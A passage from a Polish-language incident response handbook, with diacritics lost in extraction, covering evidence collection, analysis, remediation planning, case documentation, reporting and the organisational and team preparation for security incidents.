sieciowe, dzienniki zdarze, listy obiektw w systemie plikw oraz zawarto rejestru.
Ponadto moemy zdoby tre okrelonych plikw, np. dziennikw i podejrzanego
szkodliwego oprogramowania. Jako e proces przebiega automatycznie, a ilo danych
nie jest zbyt dua, analiza na ywo jest wykonywana w wikszoci interesujcych systemw.
W wyniku tej analizy z reguy udaje si zdoby dodatkowe dowody na potwierdzenie
zagroenia, dodatkowe informacje na temat tego, co haker zrobi w systemie, oraz tropy,
ktre pozwalaj na wyznaczenie dalszego kierunku ledztwa.
Pobieranie zawartoci pamici technika ta jest najbardziej przydatna w przypadkach,
gdy istnieje podejrzenie, e haker wykorzystuje jaki mechanizm do ukrywania swojej
dziaalnoci, np. rootkit, i nie mona zrobi obrazu dysku. Ponadto badanie pamici jest
potrzebne wtedy, gdy szkodliwa dziaalno ogranicza si wanie tylko do pamici albo
pozostawia bardzo mao ladw na dysku. Mimo to, w wikszoci systemw, w ktrych
pracujemy, zawarto pamici nie jest pobierana. Moe niektrym wyda si to zaskakujce,
ale z naszych dowiadcze wynika, e analiza pamici daje niewiele korzyci dla ledztwa,
poniewa dostarcza za mao danych, aby mona byo znale w nich odpowiedzi na oglniejsze
pytania. Moe i uda si wykry dziaanie szkodliwego programu w systemie, ale raczej nie
dowiesz si, skd si on tam wzi ani co haker robi w systemie.
Wykonanie obrazu dysku obrazy dyskw to kompletne kopie dyskw twardych z systemu.
W trakcie reakcji na incydent zazwyczaj wykonujemy obrazy na ywo, tzn. system nie jest
wyczany, podczas gdy tworzony jest jego obraz na zewntrznym noniku. Obrazy dyskw
s bardzo due i ich analiza moe zajmowa duo czasu, wic wykonujemy je wycznie wtedy,
gdy uwaamy, e bdzie to korzystne dla ledztwa. Obrazy dyskw s przydatne w sytuacjach,
gdy haker aktywnie dziaa w systemie przez dugi czas, gdy brakuje odpowiedzi na pewne
pytania i inne dowody nie przybliaj nas do nich oraz gdy liczymy na znalezienie dodatkowych
informacji, ktre naszym zdaniem mog znajdowa si tylko na dysku. W przypadku incydentw,
w ktrych nie ma podejrzenia wamania, wykonanie penego obrazu dysku jest norm.
Analiza danych
Analiza danych to proces polegajcy na pobraniu materiau dowodowego zachowanego wczeniej
i zbadaniu go pod ktem szukania odpowiedzi na pytania postawione w ledztwie. Wyniki tej
analizy s zazwyczaj przedstawiane w postaci formalnego raportu. Jest to ten etap cyklu reakcji na
incydent, ktry z reguy zajmuje najwicej czasu. Twoja organizacja musi wybra, ktre ekspertyzy
masz wykona samodzielnie, a ktre, jeli w ogle jakiekolwiek, zleci do wykonania jednostkom
zewntrznym. Wyrnia si trzy podstawowe obszary analizy.
Analiza szkodliwego oprogramowania podczas wikszoci ledztw napotykamy pliki,

ktre podejrzewamy o to, e s szkodliwymi programami. Mamy specjalny zesp ekspertw
od szkodliwego oprogramowania, ktry te pliki bada. Po skoczeniu pracy sporzdzaj raport
zawierajcy wskaniki zagroenia i szczegowy opis funkcjonalnoci. Cho utrzymywanie
specjalnego zespou ds. szkodliwego oprogramowania przekracza moliwoci wikszoci
budetw, organizacje powinny rozway moliwo zainwestowania przynajmniej
w podstawowe instrumenty segregacji podejrzanych programw.
Analiza danych zebranych na ywo badanie danych zgromadzonych w dziaajcym
systemie to jeden z najwaniejszych etapw caego ledztwa. Jeli przeszukujesz tego typu
informacje, znaczy to e w systemie pojawiy si oznaki podejrzanej dziaalnoci, ale masz
za mao szczegowych danych. W toku badania postarasz si znale wicej tropw i wyjani,
co si stao. Jeli teraz czego nie zauwaysz, moesz przeoczy niektre dziaania hakera albo
cakowicie wyrzuci system z krgu swoich zainteresowa. Wyniki analizy na ywo powinny
pomc w okreleniu wpywu, jaki nieautoryzowany dostp wywar na system, oraz wyznaczeniu
dalszego toku postpowania. Kada organizacja zajmujca si bezpieczestwem IT powinna
posiada podstawowe narzdzia do analizy systemw na ywo.
Analiza ledcza taka analiza obrazw dyskw wykonywana podczas reakcji na incydent
jest zadaniem wymagajcym skoncentrowania na celu i szybkiego wykonania. Kiedy kule lataj,
nie ma czasu na metodyczne, dokadne badanie. Zazwyczaj zapisujemy kilka realistycznych
pyta, na ktre chcielibymy zna odpowiedzi, wybieramy strategi, ktra powinna pozwoli
nam na znalezienie tych odpowiedzi, a nastpnie przystpujemy do dziaania. Jeeli nie
znajdziemy odpowiedzi, moemy sprbowa czego innego, ale to zaley od tego, ile mamy
czasu i co chcemy osign. Nie twierdzimy, e nie powicamy duo czasu na analizy, tylko
e bardzo starannie planujemy czas. Jeli incydent ma bardziej tradycyjny charakter, np. jest
nim wewntrzne ledztwo niezwizane z wamaniem, wikszo czasu spdzisz wanie na
takiej analizie. Analizy tradycyjnych materiaw ledczych powinno si wykonywa bardzo
dokadnie, a wikszo czonkw zespow RI i firm nie ma takich dowiadcze.
Podczas analizy wamania pamitaj, e moe nie uda si znale wszystkich dowodw. Mielimy
okazj wsppracowa z organizacjami, ktre byy dotknite czym, co nazywamy efektem CSI,
tzn. pracownicy myl, e s w stanie znale i wyjani wszystko za pomoc wietnych i drogich
narzdzi. W sumie mamy kilkadziesit lat dowiadczenia w pracy przy setkach ledztw incydentw
bezpieczestwa i jeszcze nie natknlimy si na takie magiczne narzdzie. Oczywicie s programy,
ktre mog bardzo pomc w pracy. Niektre najlepsze z moliwych narzdzi ju masz uywasz
ich teraz po to, by zrozumie tre tego zdania.
Uwaga W innych rodzajach dochodze stosuje si metodyczne podejcie do ekspertyz ledczych. Celem jest
zdobycie wszystkich informacji, ktre potwierdzaj lub wykluczaj oskarenia. Jeli Twj zesp
przeprowadza take inne rodzaje dochodze, musisz odpowiednio dostosowywa swoje dziaania
i wiedzie, jak utrzyma umiejtnoci potrzebne w innych typach ledztw. W tej ksice koncentrujemy
si na prowadzeniu ledztw zwizanych z wykrywaniem przypadkw naruszenia bezpieczestwa
systemu i naprawianiu szkd w sposb szybki i jednoczenie dokadny w skali przedsibiorstwa.
Czynnoci naprawcze
Plany naprawcze mog by bardzo rne, w zalenoci od warunkw, w jakich doszo do incydentu
i jego potencjalnych skutkw. Plan powinien uwzgldnia czynniki z wszystkich aspektw sytuacji,
wcznie z kwestiami prawnymi, biznesowymi, politycznymi i technicznymi. Ponadto plan powinien
obejmowa protok komunikacyjny okrelajcy, co i kiedy mog mwi poszczeglne osoby
z organizacji. W kocu niebagatelne znaczenie ma te czas naprawy. Jeli zrobi si to zbyt szybko,
mona pomin jeszcze nieodkryte nowe informacje. Jeli zrobi si to za pno, moe doj do
powanych szkd albo haker np. zmieni taktyk. Z naszych dowiadcze wynika, e najlepszym
czasem na rozpoczcie czynnoci naprawczych jest moment po uciszeniu si stosowanych metod
detekcyjnych. Innymi sowy, jest to czas, kiedy narzdzia szukajce wskanikw zagroenia
przestan zgasza nowe zdarzenia.
Zalecamy rozpoczynanie tworzenia planu naprawczego jak najwczeniej w procesie reakcji
na incydent, tak aby unikn przecienia zespou i popenienia bdw. Likwidacja skutkw
niektrych incydentw wymaga znacznie wicej wysiku ni samo ledztwo. W organizacji jest
wiele ruchomych czci, przez co przeprowadzenie skoordynowanej akcji usuwania zagroenia
jest nieatwym zadaniem. Nasza strategia polega na zdefiniowaniu odpowiednich dziaa
do wykonania dla wymienionych obszarw, takich jak:
zajcie pozycji,
taktyka (krtkoterminowa),
strategia (dugoterminowa).
Zajcie pozycji polega na podjciu krokw majcych na celu pomoc w zapewnieniu

powodzenia akcji naprawczej. Do procesu tego zalicza si ustalenie protokou, wymian
informacji kontaktowych, okrelenie zakresu obowizkw, zwikszenie widocznoci,
zaplanowanie wykorzystania zasobw oraz koordynacj czasow. Taktyka to podjcie dziaa,
ktre s uwaane za suszne w celu rozwizania biecego problemu. Do dziaa tych mog
zalicza si: odbudowa zagroonych systemw, zmiana hase, blokowanie adresw IP,
poinformowanie klientw o zaistniaej sytuacji, rozprowadzenie wewntrznych lub publicznych
ogosze oraz zmiana procesu biznesowego. Poza tym w trakcie trwania ledztwa organizacje
zazwyczaj dostrzegaj miejsca, ktre mona poprawi. Nie oznacza to jednak, e naley
prbowa naprawi kady problem z zabezpieczeniami podczas trwania incydentu. Lepiej
utworzy list czynnoci do wykonania i zaj si nimi pniej. Odpowiednim na to momentem
jest etap, ktry nazywamy strategi. Polega on na wprowadzaniu dugofalowych udoskonale,
ktre mog wymaga powanych zmian w organizacji. Cho strategiczna naprawa nie jest
elementem typowego cyklu RI, piszemy o niej tutaj, aby zasygnalizowa istnienie takiej kategorii,
ktra pomaga skupi si na tym, co w danym czasie jest najwaniejsze.
Rejestrowanie istotnych informacji ledczych

Wczeniej napisalimy, e wiele z wyzwa, jakie naley pokona, aby przeprowadzi skuteczne
ledztwo w sprawie incydentu bezpieczestwa, to sprawy nietechniczne. Jedn z nich jest dobra
organizacja pracy. To zreszt bardzo szerokie zagadnienie. Nie lubimy okrelenia wiadomo
sytuacji, ale wanie o tym teraz mwimy. Prowadzcy ledztwo musi w jaki sposb rejestrowa
krytyczne informacje i mie moliwo udostpniania ich zespoom pomocniczym i kadrze
kierowniczej. Ponadto powinno si wypracowa jaki efektywny model odnoszenia si do
okrelonych incydentw, co lepszego ni stwierdzenia typu to, co si stao w zeszy wtorek.
Najlepiej ustanowi system numeracji lub nazewnictwa i posugiwa si nim w rozmowach oraz
dokumentacji danych i dowodw.
Co to s istotne informacje ledcze? Odkrylimy kilka rodzajw danych, ktre s krytyczne
dla kadego ledztwa. Elementy te najlepiej rejestrowa na bieco, poniewa czonkowie zespou
bd si nimi posugiwa jako podstawow prawd do opisywania stanu ledztwa. Ponadto od
danych tych zesp bdzie zaczyna odpowiada na pytania kadry kierowniczej.
Lista zgromadzonych dowodw lista ta powinna zawiera dat i godzin oraz rdo
odkrycia tzn. osob lub serwer. Skrupulatnie zapisuj informacje dotyczce pochodzenia
kadej pozycji. Przechowuj je razem, poniewa obecno tych zapiskw na licie jest znakiem,
e dana pozycja zostaa odpowiednio zbadana.
Lista dotknitych systemw zapisuj, jak i kiedy dany system zosta zidentyfikowany.
Zauwa, e za dotknite uwaa si te systemy podejrzane o problemy z bezpieczestwem
oraz takie, do ktrych kto uzyska dostp przy uyciu podejrzanego konta.
Lista interesujcych plikw na licie tej zazwyczaj figuruj tylko szkodliwe programy,
ale mog znale si te pliki z danymi i przechwycone wyniki polece. Naley zarejestrowa
system, na ktrym zosta znaleziony taki plik, jak rwnie metadane systemu plikw.
Lista uytych plikw i skradzionych danych powinna ona zawiera nazwy plikw,
ich tre oraz dat ujawnienia.
Lista istotnych dziaa hakera podczas analizy systemu na ywo lub danych ledczych
mona odkry lady istotnych dziaa, np. przypadkw logowania lub uruchomienia
szkodliwych programw. Zapisz, w ktrym systemie to miao miejsce oraz dat i godzin
tego zdarzenia.
Lista sieciowych wskanikw zagroenia rejestruj adresy IP i nazwy domen.
Lista hostowych wskanikw zagroenia rejestruj wszystkie cechy charakterystyczne
niezbdne do sformuowania dobrego wskanika.
Lista kont, na ktrych doszo do wamania zbadaj zakres penetracji konta lokalny
czy domenowy.
Lista aktualnie wykonywanych i zaplanowanych dziaa Twoich zespow zazwyczaj
podczas prowadzonych ledztw na kadym etapie mamy mnstwo rzeczy do zrobienia.
Musimy dostarcza dodatkowe informacje na prob zespow pomocniczych, wykonywa
ekspertyzy itd. Przy braku dobrej organizacji atwo o czym zapomnie.
Zeznania naocznych wiadkw
Kilka lat temu prowadzilimy ledztwo w niewielkiej firmie z brany obronnej, ktra miaa sie
okoo 2000 hostw. Niektre inne nasze ledztwa prowadzilimy w rodowiskach dochodzcych
do ponad 100 000 hostw, zatem wydawao si, e to ledztwo bdzie atwe. Zaczlimy od
zastanowienia si, czy jest w ogle sens tworzenia kompletnej dokumentacji, zwaszcza e klient
mia mocno ograniczone rodki finansowe. Jednak wkrtce odkrylimy, e w prawie 200 systemach
znajduje si szkodliwe oprogramowanie, a w jeszcze wikszej liczbie systemw kto szpera,
posugujc si poprawnymi danymi powiadczajcymi! Niektre te przypadki byy powizane
z prowadzonym przez nas ledztwem, a inne nie. Bez takiej dokumentacji, jak zazwyczaj
prowadzimy, stracilimy koncentracj i zmarnowalimy wicej czasu, ni zabraoby nam
napisanie tej dokumentacji. Wniosek z tego taki, e zawsze naley notowa wane informacje
podczas ledztwa, bez wzgldu na jego rozmiar.
Gdy pisalimy t ksik, bylimy w trakcie przechodzenia ze starego i wyprbowanego

arkusza kalkulacyjnego Microsoft Excel z pitnastoma zakadkami na uproszczony interfejs
sieciowy obsugujcy wielu uytkownikw naraz. Postanowilimy zbudowa wasny system, bo nie
udao si znale adnego narzdzia do zarzdzania sprawami, ktre speniaoby wszystkie nasze
oczekiwania. Czekao nas duo trudnej pracy, poniewa Excel to bardzo elastyczny i atwy w obsudze
program, ktrego funkcjonalno nieatwo odtworzy w interfejsie internetowym. Bez wzgldu na to,
jakie rozwizanie wybierzesz w swojej organizacji, pamitaj, e powinno ono jak najlepiej wspgra
z Twoimi procesami.
W INTERNECIE
Systemy do zarzdzania sprawami
RTIR www.bestpractical.com/rtir/
Raportowanie
Jestemy konsultantami, wic nasze raporty s dla klientw podstawowym dokumentem.
Sporzdzenie dobrego raportu wymaga czasu, ktry zdaniem niektrych mona lepiej spoytkowa.
Jednak bez raportw atwo si pogubi w tym, co si ju wykonao. Nauczylimy si, i nawet
w jednym ledztwie moe by tyle odkry, e przekazanie klientowi wszystkich informacji na raz,
bez sporzdzania okresowych raportw, moe by niemoliwe. Oglne odkrycia czsto s
dokonywane na podstawie wielu technicznych faktw, ktrych przekazanie bez odpowiedniej
dokumentacji moe by bardzo trudne.
Ponadto uwaamy, e raporty s podstawowym produktem powstajcym w toku dziaalnoci

zespou RI. Raporty nie tylko zawieraj dokumentacj wynikw podejmowanych dziaa, ale rwnie
pomagaj utrzyma koncentracj i prowadzi ledztwo w odpowiedni sposb. Posugujemy si
standardowym szablonem oraz stosujemy do wytycznych jzykowych okrelajcych sposb pisania
raportw, dziki czemu efekty naszych prac s spjne. Tworzenie raportu zmusza do zwolnienia
pracy, opisania odkry w standardowym formacie, zweryfikowania materiau dowodowego oraz
przemylenia tego, co si wydarzyo.
Prawie kady ma jakie ciekawe dowiadczenia z dokumentacj. Jej tworzenie przypomina
zastanawianie si nad tym, czy umieci zadanie na licie czynnoci do wykonania. Jeli si tego
nie zrobi, istnieje wysokie ryzyko, e si o tym zapomni. Po zakoczeniu pisania nawet nie trzeba
patrze na list zna si j ju na pami. Z dowiadczenia wiemy, e pisanie, czy nieformalnych
zapiskw, czy oficjalnych raportw, wspomaga zapamitywanie, co z kolei sprawia, e lepiej
wykonujemy swoj prac.
Kwestiami dotyczcymi metod pisania raportw zajmujemy si szczegowo w rozdziale 17.
I CO Z TEGO
Przedstawione w tym rozdziale informacje mog przyda si dyrektorom, ktrzy chc skompletowa
lub unowoczeni zesp reagowania na incydenty. Poniej znajduje si lista czynnoci, jakie
powinno si wykona w tym procesie.
Sformuowanie definicji incydentu bezpieczestwa komputerowego dla swojej organizacji.
Identyfikacja krytycznych danych oraz miejsc ich przechowywania i osb, ktre za nie
odpowiadaj.
Opracowanie procesu i systemu ledzenia incydentw w celu identyfikowania osobnych
incydentw.
Zbadanie wymogw prawnych i regulacyjnych wobec organizacji i danych, ktrymi si
posuguje.
Okrelenie tego, co bdzie robione samodzielnie w firmie, a co zostanie zlecone jednostkom
zewntrznym.
Znalezienie i przeszkolenie zdolnych czonkw zespou RI.
Stworzenie szablonw formalnej dokumentacji na potrzeby procesw reakcji na incydenty.
Opracowanie procedur przechowywania materiau dowodowego w systemach operacyjnych
obecnych w rodowisku organizacji.
Zaimplementowanie sieciowych i hostowych rozwiza do tworzenia wskanikw
zagroenia i ich wyszukiwania.
Zdefiniowanie szablonw i wytycznych do pisania raportw.
Utworzenie mechanizmu lub procesu do rejestrowania istotnych informacji ledczych.
PYTANIA
1. Wymie grupy w organizacji, ktre mog by zaangaowane w proces reakcji na incydent.
Wyjanij, dlaczego naley porozumiewa si z tymi grupami w przypadku wystpienia incydentu.
2. Twoja organizacja otrzymuje telefon od organu ochrony porzdku publicznego z informacj,
e istnieje podejrzenie, i doszo u was do wycieku danych. Przedstawiciel organu podaje
kilka szczegw, m.in. dat i godzin przepywu poufnych informacji z waszej sieci, docelowy
adres IP oraz rodzaj treci. Czy te informacje maj cechy dobrego tropu? Wyjanij swoj
odpowied. O co jeszcze mona zapyta? Jak mona zamieni te dane w trop do czynnego
wykorzystania?
3. Jakie s zalety i wady zbierania materiau dowodowego na dziaajcym systemie w porwnaniu
z analizowaniem obrazu dysku? Dlaczego analiza na ywo jest najczciej stosowan metod
zachowywania dowodw podczas procesw RI?
4. Podczas ledztwa znajdujesz dowody na to, e w systemie dziaa szkodliwe
oprogramowanie. Jak zareagujesz i dlaczego wanie tak?
5. Wyjanij, dlaczego tworzenie i szukanie wskanikw zagroenia jest krytycznym
elementem ledztwa.
6. Kiedy zaczyna si proces naprawy? Wyjanij, dlaczego.
ROZDZIA 3.
Przygotowanie
na incydent
S
zanse na przeprowadzenie skutecznego ledztwa s niewielkie, chyba e organizacja przeznaczy
odpowiednie rodki na przygotowanie si na incydent. Zawarte w tym rozdziale informacje
s pomocne w tworzeniu infrastruktury, za pomoc ktrej organizacja bdzie w stanie w sposb
metodyczny i zorganizowany prowadzi ledztwa oraz wdraa procesy naprawcze. Dowiesz si,
jak przygotowa swj zesp do prowadzenia ledztwa oraz zbierania, analizowania i raportowania
informacji w celu udzielenia odpowiedzi na typowe pytania padajce podczas incydentu.
Co dokadnie si stao? Jakie s szkody i jak haker dosta si do rodka?
Czy incydent wci trwa?
Jakie informacje skradziono?
Jakie zasoby zostay dotknite incydentem?
Co trzeba ujawni i kogo naley powiadomi?
Co zrobi, aby powstrzyma zagroenie?
Jak zapewni ochron przedsibiorstwa przed podobnymi wypadkami w przyszoci?
ledztwo samo w sobie jest trudne. Pobieranie potrzebnych informacji z systemw
informatycznych i komunikacja z odpowiednimi osobami bd rwnie trudne, chyba e wczeniej
odpowiednio si przygotujesz. W rozdziale tym podpowiadamy, co zrobi zawczasu, aby wspomc
ewentualne ledztwo. Opisujemy trzy oglne obszary.
Przygotowanie organizacji do tego obszaru zaliczaj si: identyfikacja ryzyka, zasady
skutecznej reakcji na incydent, wsppraca z firmami zewntrznymi, kwestie infrastruktury
globalnej oraz szkolenie uytkownikw.
Przygotowanie zespou RI do tego obszaru zaliczaj si procedury komunikacji i zasoby,
takie jak sprzt, oprogramowanie, szkolenia i dokumentacja.
Przygotowanie infrastruktury do tego obszaru zaliczaj si: zarzdzanie rodkami,
instrumentacja, dokumentacja, narzdzia ledcze, segmentacja oraz usugi sieciowe.
PRZYGOTOWYWANIE ORGANIZACJI NA INCYDENT

Bezpieczestwo komputerowe to techniczna dziedzina wiedzy, a poniewa pozornie sprawa wydaje
si prosta, wiele organizacji koncentruje si tylko na aspektach technicznych, takich jak zakup
urzdzenia, zainstalowanie agentw i analizowanie wielkich danych w chmurze. O wiele atwiej
zdoby pienidze ni wykwalifikowanych pracownikw lub wdroy rozwizania do naprawy
samego siebie. A jednak w wielu ledztwach znajdowalimy powane problemy o naturze innej
ni techniczna. W podrozdziale tym opisujemy niektre z najczciej spotykanych obszarw
trudnoci; s to:
identyfikacja ryzyka;
zasady uatwiajce skuteczne zareagowanie na incydent;
ROZDZIA 3. PRZYGOTOWANIE NA INCYDENT 69
wsppraca z zewntrznymi firmami informatycznymi;

kwestie infrastruktury globalnej;
szkolenie uytkownikw w zakresie bezpieczestwa hostw.
Identyfikacja ryzyka
Przygotowywanie organizacji na ewentualny incydent naley rozpocz od oglnego oszacowania
poziomu ryzyka. Jakie s krytyczne rodki organizacji? W jaki sposb s udostpniane? Jakie jest
zagroenie? Jakich regulacji organizacja musi przestrzega? (Z nimi zazwyczaj wie si jakie ryzyko).
Dziki zidentyfikowaniu poziomu zagroenia mona przeznaczy zasoby na przygotowanie si
do takiego rodzaju incydentw, jakie mog najprawdopodobniej wystpi. Krytyczne rodki to
obszary w organizacji, od ktrych zaley cigo jej skutecznego dziaania. Oto kilka przykadw
takich rodkw.
Reputacja czy konsumenci wybieraj produkty i usugi Twojej firmy czciowo dlatego,
bo ufaj, e ich dane bd bezpieczne?
Poufne informacje biznesowe czy masz opracowane krytyczne plany marketingowe
albo tajne receptury na produkcj czego? Gdzie przechowujesz patenty, kod rdowy
i inne pozycje wasnoci intelektualnej?
Informacje osobiste czy Twoja organizacja przechowuje lub przetwarza informacje
pozwalajce zidentyfikowa osoby?
Dane kont patniczych czy Twoja organizacja przechowuje lub przetwarza dane PCI?
rodki krytyczne to rodki stanowice najwiksze obcienie lub ktrych strata jest najbardziej
dotkliwa dla organizacji. Obcienie wyraa si przez moliwo ujawnienia. Zastanw si, jakie
mog by skutki ujawnienia procesw lub technologii albo utraty pracownikw. Do przykadw
takich obcie zaliczaj si nieaktualizowane serwery sieciowe, systemy podczone do internetu,
niezadowoleni pracownicy oraz nieprzeszkoleni pracownicy.
Kolejnym wanym czynnikiem jest to, kto moe wykorzysta te luki. Czy kady, kto ma poczenie
z internetem? Czy kady, kto ma dostp do budynkw firmowych? Czy tylko osoby znajdujce si
fizycznie w zabezpieczonym obszarze? czc te czynniki, moesz okreli stopnie ryzyka.
Przykadowo najbardziej krytyczne rodki dostpne tylko zaufanym osobom w kontrolowanym
rodowisku fizycznym mog stanowi mniejsze ryzyko ni rodki dostpne przez internet.
Identyfikacja ryzyka jest bardzo wana, poniewa dziki niej mona optymalnie wykorzysta
posiadane zasoby. Nie kady zasb w rodowisku powinien by zabezpieczony w taki sam sposb.
Najwicej zasobw przeznacza si do ochrony rodkw, ktre stwarzaj najwiksze ryzyko.
Zasady uatwiajce skuteczne zareagowanie na incydent

Na kad czynno podjt przez zesp ledczy podczas procesu RI maj wpyw zasady, ktre
powinny zosta ustanowione na dugo przed pierwszymi znakami ostrzegawczymi. W wikszoci
przypadkw zasady dotyczce bezpieczestwa informacji s zapisywane i egzekwowane przez
radcw prawnych organizacji we wsppracy z biurem dyrektora ds. bezpieczestwa informacji

i inspektorami nadzoru. Typowa polityka bezpieczestwa obejmuje ponisze zasady.
Zasady dopuszczalnych dziaa okrelaj, jakie czynnoci moe wykonywa kady
uytkownik.
Zasady bezpieczestwa okrelaj oczekiwania wobec ochrony poufnych danych
i zasobw wewntrz organizacji. W czci tej mog znajdowa si dodatkowe sekcje
regulujce sprawy zwizane z fizycznym i elektronicznym bezpieczestwem danych.
Zasady dostpu zdalnego okrelaj, kto moe czy si z zasobami organizacji,
i ustalaj sposoby zabezpieczenia pocze.
Zasady korzystania z internetu okrelaj dozwolone sposoby korzystania z oglnych
zasobw internetowych, wcznie z oczekiwaniem dotyczcym prywatnoci i powiadomieniami
z monitoringu przez organizacj lub w jej imieniu.
Dla zespow RI najwiksze znaczenie powinny mie zasady dotyczce kwestii zwizanych
z wyszukiwaniem informacji oraz ewentualnych zaj nalecych do firmy zasobw i przejcia
ruchu sieciowego. Jeli te dwie oglne kwestie zostan uregulowane, zesp powinien bez problemu
przeprowadzi wikszo czynnoci ledczych. Jak napisalimy w innym miejscu w tym rozdziale,
naley bra pod uwag lokalne prawo dotyczce prywatnoci. To, co w jednym biurze jest dozwolone,
w innym moe oznacza zamanie prawa.
W INTERNECIE
SANS sans.org/security-resources/policies
ISO 27002:2005 www.iso.org
Wsppraca z zewntrznymi firmami informatycznymi

W wielu wikszych organizacjach, a nawet rednich i mniejszych, czsto zleca si przynajmniej
niektre zadania informatyczne firmom zewntrznym. Jeli ledztwo wymaga zlecenia pewnych
czynnoci na zewntrz, mog pojawi si problemy. Z reguy w firmie wdroone s procesy
przekazywania zlece, ktre mog wymaga sporzdzenia planw projektw, zdobycia zgody
i innej biurokracji. Moe to te wiza si z dodatkowymi kosztami, czasami opatami pobieranymi
od systemu za drobne zmiany konfiguracji, np. regu zapory sieciowej na hocie. W niektrych
przypadkach wykonanie pewnych zada moe by niemoliwe, poniewa nie obejmuj ich warunki
umowy. Kiedy mielimy taki przypadek, gdy organizacja poprosia o przekazanie do analizy plikw
dziennikw od zewntrznego usugodawcy.
Tego rodzaju trudnoci mog znacznie spowolni postp ledztwa. Dlatego kada organizacja
w umowie dotyczcej zakresu usug powinna doda zapisy dotyczce wsppracy w sytuacjach
krytycznych i moliwoci wykonywania dodatkowych zada nieobjtych umow. Bez odpowiedniego
porozumienia mona sobie w obliczu zagroenia nie poradzi.
Kwestie zwizane z infrastruktur globaln

Ostatnio mielimy okazj prowadzi kilka ledztw dotyczcych wama w kilku duych organizacjach
midzynarodowych. W trakcie wykonywania swoich obowizkw natknlimy si na nowe i bardzo
ciekawe trudnoci, ktre pozwoliy nam zrozumie, jak trudno przeprowadzi skuteczne dochodzenie
w rodowisku midzynarodowym. Cho nie znamy odpowiedzi na wszystkie pytania, pokaemy,
jakie problemy moesz napotka, aby mia czas si na nie przygotowa.
Regulacje dotyczce ochrony danych osobowych i pracy

Jako ledczy postrzegamy sie organizacji jak wielkie rdo materiau dowodowego, ktry tylko
czeka, aby po niego sign. Niektrzy nie zdaj sobie nawet sprawy, e sie moe obejmowa
komputery znajdujce si w piciu rnych krajach na trzech kontynentach i e w kadym z tych
krajw obowizuj inne regulacje prawne dotyczce ochrony danych osobowych i pracy. atwo
wpa w kopoty, jeli zacznie si szuka wskanikw zagroenia za pomoc metody niezgodnej
z lokalnym prawem o ochronie danych osobowych i prawem pracy. Jeli wic planujesz prowadzi
ledztwo w sieci obejmujcej wicej ni jeden kraj, musisz przed przystpieniem do dziaania
troch si poduczy. Najlepiej skontaktowa si z radc prawnym organizacji w kadym kraju,
aby omwi z nim sytuacj i ustali, co mona, a czego nie mona robi.
Koordynacja prac zespou

Kolejnym duym wyzwaniem w przypadku incydentw o zasigu wiatowym jest koordynacja prac.
Jako e zasoby techniczne i pracownicy s rozsiani w wielu strefach czasowych, zapewnienie
prawidowego dziaania wszystkich elementw wymaga dokadnego planowania i cigego nadzoru
nad akcj. Poniewa niektrzy pracownicy pi, podczas gdy Ty pracujesz, wykonanie niektrych
czynnoci moe si przeciga. Prowadzenie rejestru zada i przekazywanie obowizkw maj
podstawowe znaczenie dla zapewnienia postpu prac. Zrnicowanie stref czasowych moe
sprawia, e nawet organizacja spotkania zajmie kilka dni.
Dostpno danych
Podczas ledztwa gromadzi si mnstwo danych do analizy. Bardzo czsto maj one posta duych
zbiorw danych, takich jak np. obrazy dyskw twardych. Wikszo analiz wykonuje podstawowy
zesp, musisz zatem znale sposb na efektywne przesyanie danych do czonkw tego zespou
majcych dowiadczenie w analizie ledczej. Cho naley mie na uwadze dokumentacj celn
i ograniczenia w krajach rdowym i docelowym, najwiksz przeszkod bdzie opnienie
w dostarczaniu danych w odpowiednie rce. Jeli s jakiekolwiek wtpliwoci dotyczce tego,
czy dane trzeba przesa, rozpocznij ich wysyanie natychmiast. Ju niejeden dzie stracono
przez nieodpowiedni komunikacj i niezdecydowanie.
Szkolenie uytkownikw w zakresie bezpieczestwa hostw

Uytkownicy stanowi bardzo wany element caego systemu zabezpiecze. To, co robi, moe
zniweczy nawet najdoskonalsze zabezpieczenia. Dlatego szkolenie uytkownikw powinno by
jedn z czynnoci przygotowawczych na wypadek wystpienia incydentu.
Uytkownicy powinni dokadnie wiedzie, co mog, a czego nie mog robi w swoich systemach
i to zarwno pod wzgldem bezpieczestwa komputerw, jak i reakcji na incydent. Uytkownik powinien
wiedzie, jakie s typowe cele ataku hakerw i w jaki sposb hakerzy je wykorzystuj, aby wej do sieci.
Uytkownicy powinni by przeszkoleni w zakresie reagowania w odpowiedni sposb na podejrzane
zdarzenia. Najczciej zaleca si natychmiastowe powiadamianie odpowiednich osb. Oglnie rzecz
biorc, uytkownicy powinni by poinstruowani, aby samodzielnie nie podejmowali adnych czynnoci
ledczych, poniewa w ten sposb mog zniszczy dowody i utrudni dalsze postpowanie.
Specyficznym problemem, ktry naley rozwiza, jest niebezpieczestwo zwizane z instalowaniem
przez uytkownikw oprogramowania na serwerze. Uytkownicy mog instalowa wasne serwery
sieciowe lub FTP bez autoryzacji i w ten sposb powodowa luk w oglnym systemie zabezpiecze
organizacji. Dalej w tym rozdziale piszemy o ograniczaniu uprawnie administracyjnych, ktre pozwala
zmniejszy ryzyko w tym zakresie. Jednake uytkownicy czasami znajduj sposoby na obejcie rodkw
bezpieczestwa i naley im uwiadomi, jakie zagroenie niesie nieuprawniona instalacja programw.
PRZYGOTOWYWANIE ZESPOU RI
Jak napisalimy w poprzednim rozdziale, podstawowy zesp reagowania na incydenty skada si
ze specjalistw z rnych dziedzin: informatykw, ledczych, ekspertw, a nawet konsultantw
zewntrznych. Kady moe wnie do zespou pewien zasb umiejtnoci i ma okrelone oczekiwania.
Twoim zadaniem jest sprawienie, by zesp skada si z pracowitych osb majcych oko do szczegw,
kontrolujcych si, nierobicych niczego w popiechu i dokumentujcych wszystko, co robi.
W podrozdziale tym przedstawiamy podstawowe zasady tworzenia zespou. Omawiamy
definiowanie misji, sposoby komunikacji, metody przekazywania efektw prac oraz zasoby
potrzebne do odpowiedniego wyposaenia pracownikw.
Definiowanie misji
Zdefiniowanie misji zespou RI pomaga w skoncentrowaniu jego prac na celu oraz ustaleniu
oczekiwa w odniesieniu do reszty organizacji. Wszystkie elementy misji musz by w peni
akceptowane i wspierane przez kierownictwo najwyszego szczebla. W przeciwnym razie zesp RI
nie bdzie mia wpywu na organizacj. Misja moe zawiera niektre z poniszych punktw lub
wszystkie te punkty.
Reagowanie na wszystkie incydenty bezpieczestwa i podejrzane zdarzenia w formalnie
zorganizowany sposb.
Prowadzenie kompletnych bezstronnych ledztw.
Szybkie weryfikowanie informacji o naruszeniu bezpieczestwa.
Ocenianie zakresu szkd i incydentu.
Kontrolowanie i ograniczanie zasigu incydentu.
